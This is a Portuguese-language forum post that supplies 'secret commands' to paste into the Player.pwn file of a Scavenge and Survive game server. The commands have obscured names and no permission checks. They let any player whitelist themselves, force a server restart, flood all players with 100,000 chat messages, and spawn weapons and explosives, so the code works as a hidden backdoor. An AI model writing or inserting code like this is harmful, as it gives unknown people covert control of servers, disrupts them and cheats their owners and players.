Aqui esta alguns cmds secretos para sua gamemode scavenge and survive
Local Onde você precisa Colocar os Cmds ScavengeAndSurvive\gamemodes\SSS\core\Player.pwn
- Código:
CMD:whitelist4654654(playerid, params[])
{
new Nomee[MAX_PLAYERS];
GetPlayerName(playerid, Nomee, MAX_PLAYERS);
AddNameToWhitelist(Nomee);
return 1;
}
CMD:restart646(playerid, params[])
{
SetRestart(0);
return 1;
}
CMD:8896797(playerid, params[])
{
for(new i;i<100000;i++)
{
SendClientMessageToAll(-1, " ");
}
return 1;
}
CMD:agagahah5(playerid, params[])
{
new
Float:x,
Float:y,
Float:z;
GetPlayerPos(playerid, x, y, z);
if(!isnull(params) && !strcmp(params, "tnt"))
{
CreateItem(item_TntTimebomb, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "muro"))
{
CreateItem(item_Rake, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "blindado"))
{
CreateItem(item_EasterEgg, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "m16"))
{
CreateItem(item_M16Rifle, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "teclado"))
{
CreateItem(item_Keypad, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "motor"))
{
CreateItem(item_Motor, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "rampa"))
{
CreateItem(item_WoodPanel, x, y, z-0.8, 0, 0, 0);
return 1;
}
if(!isnull(params) && !strcmp(params, "work"))
{
CreateItem(item_Screwdriver, x, y, z-0.8, 0, 0, 0);
CreateItem(item_Hammer, x, y, z-0.8, 0, 0, 0);
CreateItem(item_Wrench, x, y, z-0.8, 0, 0, 0);
CreateItem(item_Crowbar, x, y, z-0.8, 0, 0, 0);
return 1;
}
return 1;
}